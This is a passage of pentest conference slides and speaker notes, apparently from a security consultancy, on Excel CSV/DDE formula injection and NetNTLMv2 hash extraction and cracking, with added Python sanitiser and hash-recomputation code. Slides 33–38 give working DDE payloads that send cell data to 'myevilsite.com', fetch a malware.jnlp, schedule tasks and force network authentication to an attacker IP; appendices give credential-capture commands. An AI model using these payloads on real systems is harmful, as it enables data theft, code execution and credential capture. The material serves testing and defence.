  • 20. 20 Type 3 message – drill-down HMAC-MD5  The “blob” is everything after the HMAC in the “NTLM Response tree” • Includes client nonce, timestamp, server’s Target Info block… • Copy NTLM Response bytes, remove first 16 bytes (HMAC) • Likely to start 0x01010000 See, I told you it was v2 ;-) blob 
  • 22. 22 Wait a minute... • Tried hashcat test case for NTLMv2… admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958... Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts • Tried the same hashcat test case with John – didn’t work • Tried the smithjer hash on a GPU-based rig… Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts • Tried the smithjer hash with John in hashcat format – it worked! • So I got my PoC in the report  but why the mixed results?
  • 23. 23 It’s time to activate...
  • 24. 24 John (the Ripper, not Stuart Mill) Hash cracked Hash didn’t crack username::domain:challenge :HMAC-MD5:blob username:$NETNTLMv2$domain$c hallenge$HMAC-MD5$blob • Even though John was identifying the hash… Loaded 1 password hash (NTLMv2 C/R MD4 HMAC-MD5 [32/64]) …it wasn’t processing it correctly • John wanted the hashcat format • To be fair to pentestmonkey, the cheatsheet was… “originally based on john-1.7.8-jumbo-5. Changes in supported hashes or hash formats since then may not be reflected on this page”
  • 25. 25 Hashcat Hash Cracked Didn’t crack admin (test) admin:...:blob[53 bytes] smithjer:...:blob[360 bytes] smithjer oclHashcat (Linux) hashcat (Windows) catflap • Extracts NTLMv2 exchange from Wireshark capture file catflap <capture_file> • Recalculates NTLMv2 response with given password catflap <capture_file | hashcat_file> <password> • Allows experiments with other inputs, i.e. the “blob” • A more faithful check than the standard admin test hash
  • 26. 26 Demo Hashcat had a bug • Wasn’t handling “blobs” above a certain size • Didn’t affect oclHashcat • Didn’t affect hashcat on Linux (1)
  • 27. Can we improve the attack? - i.e cut out some of those warnings?
  • 29. Users and warnings – Piranha 44% clicked through warnings 70% clicked through warnings 75% clicked through warnings
  • 30. 30 Source of warnings • Setting is a property of the file • Only effective if file has been trusted previously • Two stage attack (low and slow)? • Benign payload =NotASheet!A1 • Malicious payload
  • 31. 31 Trusted Documents (1) (2a) Only the filename is stored Downloads with static filenames are of interest Once “trusted” if the file’s start-up prompt is set to auto-update, only the third warning (CMD.EXE) is displayed
  • 32. 32 Excel file format XLSX vs XLS vs CSV • Not something you always have control over • CSV: no Protected View warning • CSV: can’t contain start-up prompt auto-update setting CSV format in XLS file • Format warning instead of Protected View warning • Formal security warnings (1) and (2a) not shown • Therefore file cannot be not “trusted” in the registry • Curiously CSV format not supported: tab or CRLF cell delimiter
  • 33. 33 That CMD.EXE warning Built-in Excel functions • Steal data =HYPERLINK("http://myevilsite.com/?d="&A1,"Click here") • Limited info about the system e.g. current directory =INFO("DIRECTORY"), Excel version =INFO("RELEASE") • =WEBSERVICE(URL) • Sadly doesn’t support authentication (i.e. force NTLM authentication) • Or file paths (local or UNC) or file:// • But it will steal data without user interaction (unlike HYPERLINK) =WEBSERVICE("http://myevilsite.com/?data="&A1) • =FILTERXML(XML, XPATH) • Any XXE or parsing bugs?
  • 34. 34 Alternatives to cmd.exe • =powershell|'Test-Connection 127.0.0.1'!A0 Using 8.3 names doesn’t work as Excel doesn’t like ~ in the formula =cmd|'/k powershell Test-Connection 127.0.0.1'!A0 PATHEXT environment variable ignored – .exe only • .exe files in PATH where filename <= 12 characters =explorer|'https://nccgroup.trust'!A0 =schtasks|'/create /sc DAILY /tn WindowsUpdate /tr calc.exe'!A0 =javaws|'http://myevilsite.com/malware.jnlp'!A0 =rundll32|'shell32.dll,ShellExec_RunDLL calc.exe'!A0 • N.B. if Excel is 32-bit, then the program will be run as such, etc.
  • 35. 35 Native DDE services – 1/2 Tcl (Tool Command Language) • dde services "" "" {Excel {[Book1]Sheet1}} {Excel {[Book1]Sheet2}} {Excel {[Book1]Sheet3}} {Excel System} {PROGMAN PROGMAN} {Shell AppProperties} {Folders AppProperties} {PROGMAN PROGMAN} Excel • dde request excel Sheet1 r1c1:r2c3 • dde execute excel Sheet1 {[formula("overwrite","r1c1")]} • dde execute excel Sheet1 {[alert("hello")][alert("world")]} • dde execute excel Sheet1 {[file.delete("e:test")]} • dde execute excel Sheet1 {[exec("c:windowssystem32calc.exe")]} 
  • 36. 36 Native DDE services – 2/2 Progman • dde execute progman progman {[AddItem(calc.exe,Microsoft Word)]} Folders / Shell • dde execute Folders AppProperties {[ViewFolder("","attacker_IPc$",2)]} What about in Excel? • This could save you hours: when testing, if Excel hangs, try closing Tcl • =Folders|AppProperties!'{[ViewFolder("","c:windows",1)]}'  • That Tcl Service-Topic list wasn’t complete…
  • 37. 37 DDESpy • Part of Visual Studio 6 (!) • Must be running when application launches
  • 38. 38 iexplore DDE • =iexplore|WWW_OpenURL!nccgroup.com • No “remote data not accessible” warning  • Slice of BeEF anyone? • =iexplore|WWW_OpenURL!'<attacker_IP>c$' (force network authentication) • =iexplore|WWW_OpenURL!'c:windowssystem32cmd.exe' • No better than where we were really! • No obvious way to include switches anyway – a limitation of file://
  • 40. 40 Demo (1) No Protective View warning as CSV (2) Just “Enable Content” warning as DDE call succeeded • Background navigation to phishing site could be very effective (3) No warnings – exactly which stars were aligned there?! • A file with same name previously downloaded • Had content to elicit warnings, which were accepted • So it’s now “trusted” • Previous file need not have been malicious – remember =NotASheet!A1 • Malicious file’s start-up prompt set to auto-update links
  • 41. 41 Lessons From CSV to CMD • Check out any Excel export that returns user-supplied data • CSV is not a benign format • DDE ≠ macro • In some cases it may be possible to cut down the Excel warnings • Excel may have more to give in this area • Progman|Shell|Folders attractive DDE targets as always running • Very much work in progress – please explore! • All this stuff applies to red-teaming too From CMD to qwerty • Use or develop test cases i.e. something you know should work • Read the errors! • “Authoritative” references can go stale
  • 42. 42 Defence Original article • Prefix = with ' • This will “cast” the cell as text in XLS[X] and stop execution in CSV +cmd|'/k ipconfig'!A0-cmd|'/k ipconfig'!A0 =cmd|'/k ipconfig'!A0 @SUM(cmd|'/k ipconfig'!A0) "=cmd|'/k ipconfig'!A0" ""=cmd|'/k ipconfig'!A0 =(cmd|'/k ipconfig'!A0) =0-cmd|'/k ipconfig'!A0 • Validation against a strict whitelist of “known good” (length, characters, format) should always be the go-to defensive strategy • Otherwise e.g. for XLS[X] consider always prefixing cell with apostrophe
  • 43. 43 References
    DDE
    • https://www.tcl.tk/man/tcl8.6/TclCmd/dde.htm (Tcl)
    • http://rpackages.ianhowson.com/rforge/tcltk2/man/windows/tk2dde.html (examples)
    • https://support.microsoft.com/en-us/kb/128185 (Excel XLM reference)
    Hashcat test cases
    • http://hashcat.net/wiki/doku.php?id=example_hashes
    Catflap
    • https://github.com/nccgroup/ (or https://github.com/exploresecurity/catflap)
    NTLM deep-dive
    • http://davenport.sourceforge.net/ntlm.html
    • http://ubiqx.org/cifs/SMB.html#SMB.8
    • http://www.innovation.ch/personal/ronald/ntlm.html
    • http://hashcat.net/forum/archive/index.php?thread-2011.html
    • https://msdn.microsoft.com/en-us/library/cc207842.aspx
  • 44. 44 Appendix 1: NetNTLMv2 from PCAP (capture.pcap is a placeholder for the capture file)
    Challenge
      tshark -r capture.pcap -Y "ntlmssp.messagetype == 0x00000002" -T fields -e ntlmssp.ntlmserverchallenge
    Domain
      tshark -r capture.pcap -Y "ntlmssp.messagetype == 0x00000003" -T fields -e ntlmssp.auth.domain
    Username
      tshark -r capture.pcap -Y "ntlmssp.messagetype == 0x00000003" -T fields -e ntlmssp.auth.username
    HMAC-MD5
      tshark -r capture.pcap -Y "ntlmssp.messagetype == 0x00000003" -T fields -e ntlmssp.ntlmv2_response | sed 's/://g' | cut -c 1-32
    Blob
      tshark -r capture.pcap -Y "ntlmssp.messagetype == 0x00000003" -T fields -e ntlmssp.ntlmv2_response | sed 's/://g' | cut -c 33-
  • 45. 45 Appendix 2: NetNTLMv2 calculations
    1. NTHASH = MD4(Unicode password)
      echo -n "$PASSWORD" | iconv -f ascii -t utf16 | tail -c +3 | openssl dgst -md4 -binary | xxd -p
    2. INTHASH = HMAC-MD5(Unicode uppercase username | Unicode domain, NTHASH)
      echo -n "${USERNAME^^}${DOMAIN}" | iconv -f ascii -t utf16 | tail -c +3 | openssl dgst -md5 -mac HMAC -macopt hexkey:$NTHASH -binary | xxd -p
    3. HMAC = HMAC-MD5(Challenge | blob, INTHASH)
      echo -n "${CHALLENGE}${BLOB}" | xxd -r -p | openssl dgst -md5 -mac HMAC -macopt hexkey:$INTHASH -binary | xxd -p
  • 46. 46 fin You have been watching… Jerome @exploresecurity Script passable Hair needs cutting Make-up required Costume is about the right word Tip of the hat to James @albinowax Cara @bones_codes Michael Roberts Andy @ZephrFish Raquel Alvarez

Editor's Notes

  • #2: For SlideShare NB: May not look nice in places due to animations etc. I’ve made a few post-presentation edits to help with clarity and address questions I had
  • #5: None of this would normally be difficult Onsite internal test, no pentest laptop Corporate machines, locked-down users Gotchas and bugs when cracking hashes
  • #7: Just a snippet Essentially the entire Excel file was sent up, not just cell contents but presentation data, to come back down again!
  • #8: In fact it did work as a GET Incorrect content-type could yield XSS but spoiled by Content-Disposition Cache-control Report may include sensitive data May not be cached due to other headers like Content-Disposition (without this Content-Type plays a role – in this case it would be cached due to text/html but application/vnd.ms-excel for .xls or application/vnd.openxmlformats-officedocument.spreadsheetml.sheet for xlsx less certain – browser-dependent?) Even apps that have good caching headers can fall down on file download (because these requests not processed in same way, e.g. it’s a static file returned by server not application)
  • #9: Request with all possible single byte values
  • #10: Everything except the null byte came back Scope for a request that would return a malicious exploit-payload Just a curiosity – OS command execution could be achieved much more simply…
  • #11: James Kettle, PortSwigger DDE call Cell reference is not required, could be anything (cells are used when data source is another Excel sheet) Imagine e.g. program=“shares”, topic=“LSE”, item=“NCC” It’s because the DDE call fails that Excel offers to run cmd.exe
  • #12: First warning is particular to this example as the simplest payload made an XLS file that wasn’t in XLS format CMD.EXE might raise an eyebrow Other warnings may follow, by this time the payload has run
  • #13: Okay, proof of concept, but not very exciting…
  • #14: Being inside makes those creds immediately valuable
  • #15: No particular reason for choosing John - I knew the username and password, it was mine! NETNTLMv2 is a constant
  • #16: Steps are a bit like SSL/TLS handshake NTLM weak as third DES key is padded with 5 NULL bytes
  • #17: Workstation domain, name and build are all in fact optional Can be used by the server to determine whether the client is eligible for local authentication NTLM Security Support Provider (SSP) The Windows SSP Interface (SSPI) framework specifies a core set of security functionality that is implemented by supporting providers such as NTLMSSP The Microsoft equivalent of the GSS-API (Generic Security Service Application Program Interface, RFC 2743) The SSPI specifies, and the NTLMSSP implements, the core operations of authentication, integrity, and confidentiality services
  • #18: OS also Windows 7 here as attacker’s machine was a client workstation In Negotiate Flags, Target Type bits describe what Target Name is – share / server / domain Info leak: NetBIOS, DNS and workstation names but since server is me, not interesting!
  • #20: No LM – as you’d expect from default Windows 7 The first “NTLM client challenge” is used for LMv2 Client challenge a feature of NTLMv2 not NTLM
  • #21: Older version of Wireshark names the HMAC field differently e.g. “HMAC”!
  • #22: Onsite time was ending but I didn’t need to be onsite to keep trying…
  • #24: John Stuart Mill – English philosopher 1843 book “A System of Logic” included Mill’s methods – codified scientific approach to causation (technically “induction” as opposed to “deduction” – the former is probable cause, the latter is certain)
  • #26: For recalculation, catflap can take an ordinary hashcat file as well as a Wireshark pcap
  • #27: When editing blog, be careful not to remove half a byte (1 byte = 2 hex chars!) Footnote (1): only found out that Linux wasn’t affected while preparing demo – ha ha! That was another difference back on the hashcat slide – go JS Mill!
  • #28: I’ll be loosely switching between web app Excel export and red-team scenarios
  • #29: (1) because it’s come from internet location (2a) first encounter – creates registry entry to be “trusted” (2b) when trusted but links not autoupdated (3) because DDE call fails More warnings may follow after payload launches
  • #30: Piranha = NCC phishing platform Jobs where users had to accept Excel warning(s) Note that these jobs used spreadsheets laced with macros – this is different to DDE – but it’s clicking through warnings that’s of interest here Clearly we didn’t know what the user experience was in terms of warnings but the fact there was a difference between opened spreadsheets and macros run shows that some further step must have been necessary Internal Excel files often contain macros, especially within areas such as finance – users are habituated to the warnings, or the warnings may have been disabled!
  • #31: Like a packet with the evil bit set to off! Only once the Enable Content warning has been accepted does this setting make a difference =NotASheet!A1 is enough to prompt Enable Content security warning but doesn’t do anything suspicious Probably might as well hit them with everything in one go – certainly when time is limited in a test Trust Center “Workbook Links” are links to data in another workbook https://support.office.com/en-gb/article/Block-or-unblock-external-content-in-Office-documents-10204ae0-0621-411f-b0d6-575b0847a795 https://support.microsoft.com/en-us/kb/826921
  • #32: Part of Trust Center but not visible through the UI Entry in registry doesn’t require users to save the file Protected View approval registered immediately Enable content approval registered once CMD warning answered (can be “no”) Full binary value meaning? Trusted Locations are default areas, nothing useful without prior access Attack scenario: user input influences filename or application always names the file the same way Browsers may be configured to auto-download in which case they will append numbers to stop accidental overwrite  If no filename in Content-Disposition then FF will name file by the page in the URI + an extension based on Content-Type e.g. export.asp.xls so this would produce same filename
  • #33: Although CSV no PV, the EC warning means it can be trusted in registry Invalid XLSX not tolerated Excel 2010 vs 2013 no real difference URI extension: doesn’t matter if request is for .xls or .asp etc Content-Type / Content-Disposition filename dominant But text/csv not recognised so only if URI is .csv will it be opened correctly, otherwise e.g. .asp will fail Document opened inline vs saved & opened from disk If inline, URI must end CSV, otherwise similar to above Invalid XLS format 1,2,3,=cmd|'/k ipconfig'!A3 Valid XLS formats =cmd|'/k ipconfig'!A3 1 2 3 =cmd|'/k ipconfig'!A3 1 2 3 =cmd|'/k ipconfig'!A3
  • #34: Can we get rid of or soften that CMD.EXE warning?
  • #35: Tried =powershell in Excel 2010 (32-bit), 2013 (32-bit), 2016 (64-bit) Tilde means next character is a literal e.g. in Find, but can’t be escaped in formula with ~~ or \~ etc ??? Not many files have 8.3 alternative anyway Find files < 8 chars plus .exe by powershell "cmd /c dir *.exe /b |? {$_.length -lt 13}" explorer will open default browser Java Web Start – may be disabled anyway but fun!
  • #36: Tcl first needs “package require dde” Data theft from sheet a little alarming, although something malicious would already have to be running You can overwrite cells of the spreadsheet that you can’t otherwise influence using the web app Use of Alert vs MsgBox -> XLM macro language in Excel 4.0 before VBA (old help file in reference at end) Alert also demonstrates multiple statements i.e. [macro 1][macro 2] Exec didn’t work, nor did fopen
  • #37: Documentation on DDE interfaces poor – I was Googling so much, Google thought I was a robot! Progman manipulates shortcuts in Start | All Programs Screenshot of typing “word” into Start search menu Can’t use DeleteItem to delete real Microsoft Word 2010 as link is in “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office” which ordinary user can’t delete Folders instructs Windows Explorer (Shell interface unknown, seems to mirror Folders) The “2” minimises the window Doesn’t accept URL All 3 services seem to live in shell32.dll – is there a ShellFile topic? Clear out DDE channels from Excel https://social.technet.microsoft.com/Forums/office/en-US/7c8f845d-c4aa-4627-9008-3251d2772536/dde-links-crash-excel-2010-on-windows-7-64bits?forum=excel
    Dim i, ChannelNumber As Integer
    For i = 1 To 1000
      Application.DDETerminate (i)
    Next i
  • #38: Strings C:\Windows\System32\ieframe.dll WWW_URLEcho WWW_OpenURL WWW_GetWindowInfo WWW_ShowFile WWW_OpenURL WWW_Exit WWW_Activate WWW_UnregisterURLEcho WWW_RegisterURLEcho WWW_UnregisterProtocol WWW_RegisterProtocol WWW_OpenURLNewWindow WWW_ListWindows C:\Program Files (x86)\Mozilla Firefox\xul.dll WWW_GetWindowInfo WWW_RegisterViewer WWW_UnRegisterViewer WWW_CancelProgress WWW_Version WWW_OpenURL WWW_Activate
  • #39: Only works if IE running
  • #40: Trailing / in URL important Note that only URL of active tab obtained
  • #42: With red-teaming, results may differ with emailing docs “From CMD to qwerty” - advice common to all tools not just password crackers The closer the test is to your unknown state, the better
  • #43: The @ was originally an alias for = to make life easy for converts from Lotus Notes SUM could also be COUNT, COS… Consider phone number – it may have a + at the front but so structured elsewhere that it can be well protected Prefixing with ' may break some numerical operations on that cell e.g. SUM but if you’re expecting a number then use a whitelist; text functions should still work For CSV what about regex \W.+\|.+!.+ or \W[a-zA-Z\.]+\(.*\) Only if whitelisting can’t be done! First for DDE, second for Excel formula \W (capital) matches non-alphanumeric It’s unlikely “normal” input would match these
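The Defence slide (42) and the two CSV regexes from the #43 note, combined into one added example. This is my code, not the speaker's or NCC Group's: the whitelist-first export, the apostrophe prefix as the fallback, and the regex detector run over the exact payload variants listed on the slide. The phone-number whitelist and the function names are my own assumptions; the payload list and regexes are copied from the page.

```python
import csv
import io
import re
from typing import Optional

# Characters that make Excel evaluate a CSV cell: '=' plus the variants from
# the slide ('+', '-', '@'). A leading quote can hide them, so it is looked past.
FORMULA_TRIGGERS = ("=", "+", "-", "@")

# Constructed whitelist for a phone field (assumption): optional '+', digits, spaces.
PHONE_WHITELIST = re.compile(r"\+?[0-9 ]{6,20}")

# The two regexes from the #43 note: DDE call (program|topic!item) and a
# function-style formula such as @SUM(...). Fallback only, when no whitelist fits.
DDE_PATTERN = re.compile(r"\W.+\|.+!.+")
FORMULA_PATTERN = re.compile(r"\W[a-zA-Z\.]+\(.*\)")

# Payload variants as listed on the Defence slide.
SLIDE_PAYLOADS = [
    "+cmd|'/k ipconfig'!A0",
    "-cmd|'/k ipconfig'!A0",
    "=cmd|'/k ipconfig'!A0",
    "@SUM(cmd|'/k ipconfig'!A0)",
    "\"=cmd|'/k ipconfig'!A0\"",
    "\"\"=cmd|'/k ipconfig'!A0",
    "=(cmd|'/k ipconfig'!A0)",
    "=0-cmd|'/k ipconfig'!A0",
]


def matches_whitelist(value: str, pattern: re.Pattern) -> bool:
    """Go-to defence: accept only input that fully matches a known-good format."""
    return pattern.fullmatch(value) is not None


def looks_like_formula(value: str) -> bool:
    """Detection for CSV export using the two regexes from the notes."""
    return bool(DDE_PATTERN.search(value) or FORMULA_PATTERN.search(value))


def neutralise_cell(value: str) -> str:
    """Prefix with an apostrophe so Excel stores the cell as text.

    Leading whitespace and double quotes are skipped before checking the
    trigger character, because a CSV reader may strip them first.
    """
    head = value.lstrip(" \t\r\n\"")
    if head[:1] in FORMULA_TRIGGERS:
        return "'" + value
    return value


def export_value(value: str, whitelist: Optional[re.Pattern] = None) -> str:
    """Whitelist when the field has a known format (keeps numbers numeric);
    otherwise fall back to the apostrophe prefix."""
    if whitelist is not None and matches_whitelist(value, whitelist):
        return value
    return neutralise_cell(value)


def to_csv_line(values, whitelists=None) -> str:
    """One exported CSV row with every cell passed through export_value."""
    whitelists = whitelists or [None] * len(values)
    buf = io.StringIO()
    csv.writer(buf).writerow(export_value(v, w) for v, w in zip(values, whitelists))
    return buf.getvalue()


if __name__ == "__main__":
    for p in SLIDE_PAYLOADS:
        print(f"{looks_like_formula(p)!s:5} {neutralise_cell(p)}")
    print(to_csv_line(["hello world", "+44 161 555 0100", "=cmd|'/k ipconfig'!A0"],
                      [None, PHONE_WHITELIST, None]), end="")
```

The phone number survives untouched because it matches its whitelist, while the same leading `+` on a DDE string gets the apostrophe; that is the point of the note's "if you're expecting a number then use a whitelist".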
  • #44: Another good DDE reference (but beware ad clicks) http://www.angelfire.com/biz/rhaminisys/ddeapps.html#DDEExcelCrash
  • #46: (1) Unicode = UTF-16 little endian; iconv adds a 2-byte “Byte Order Mark” (BOM) FFFE – a magic number to signal little-endian UTF-16; xxd -p takes STDIN and outputs ASCII hex (2) NTHASH is the key; ${USERNAME^^} converts to upper case (3) INTHASH is the key
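The three steps of Appendix 2 carried over to Python as an added example (my code, not the speaker's script or catflap). It takes the hex fields that the Appendix 1 tshark commands print and recomputes the HMAC for a candidate password, which is the "use test cases, something you know should work" lesson from slide 41 applied to a capture before anything is fed to a cracker. MD4 is written out in full because Python builds on OpenSSL 3 often have no md4 in hashlib. The sample inputs are the published MS-NLMP test vector (user User, domain Domain, password Password, server challenge 0123456789abcdef), not data from the engagement; the function names are mine.

```python
import hashlib
import hmac
import struct


def _lrot(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320; pure Python so it works where hashlib lacks md4."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1
            a = _lrot((a + f(b, c, d) + x[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a = _lrot((a + g(b, c, d) + x[k] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            k = (0, 2, 1, 3)[i // 4] + (0, 8, 4, 12)[i % 4]
            a = _lrot((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = [(v + w) & 0xFFFFFFFF for v, w in ((a, aa), (b, bb), (c, cc), (d, dd))]
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    # Step 1: NTHASH = MD4(UTF-16LE password); no BOM, which is what `tail -c +3` strips.
    return md4(password.encode("utf-16-le"))


def ntowf_v2(password: str, username: str, domain: str) -> bytes:
    # Step 2: INTHASH = HMAC-MD5(key=NTHASH, UTF-16LE(upper(username) + domain)).
    data = (username.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash(password), data, hashlib.md5).digest()


def net_ntlmv2_proof(password: str, username: str, domain: str,
                     challenge_hex: str, blob_hex: str) -> str:
    # Step 3: HMAC = HMAC-MD5(key=INTHASH, challenge || blob), as hex like tshark prints it.
    key = ntowf_v2(password, username, domain)
    data = bytes.fromhex(challenge_hex) + bytes.fromhex(blob_hex)
    return hmac.new(key, data, hashlib.md5).hexdigest()


def verify_capture(captured_hmac_hex: str, password: str, username: str, domain: str,
                   challenge_hex: str, blob_hex: str) -> bool:
    """Test case: does a known password reproduce the HMAC cut from the capture?"""
    expected = net_ntlmv2_proof(password, username, domain, challenge_hex, blob_hex)
    return hmac.compare_digest(expected, captured_hmac_hex.lower())


# MS-NLMP test vector (not engagement data): client challenge aa*8, timestamp 0,
# target info = NetBIOS domain "Domain" and NetBIOS server "Server".
MSNLMP_CHALLENGE = "0123456789abcdef"
MSNLMP_BLOB = (
    "0101000000000000" "0000000000000000" "aaaaaaaaaaaaaaaa" "00000000"
    "02000c00" "44006f006d00610069006e00"  # AvPair 2: NbDomainName "Domain"
    "01000c00" "530065007200760065007200"  # AvPair 1: NbComputerName "Server"
    "00000000" "00000000"                  # AvPair EOL, Reserved
)

if __name__ == "__main__":
    print("NTHASH  :", nt_hash("Password").hex())
    print("INTHASH :", ntowf_v2("Password", "User", "Domain").hex())
    print("HMAC    :", net_ntlmv2_proof("Password", "User", "Domain", MSNLMP_CHALLENGE, MSNLMP_BLOB))
```

Feeding the Appendix 1 fields from a real capture into verify_capture with the account's own password, as the talk did with the speaker's own account, tells you whether the parsing (the "half a byte" trap in the #27 note) is right before any cracking time is spent.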
  • #47: Repeat question from audience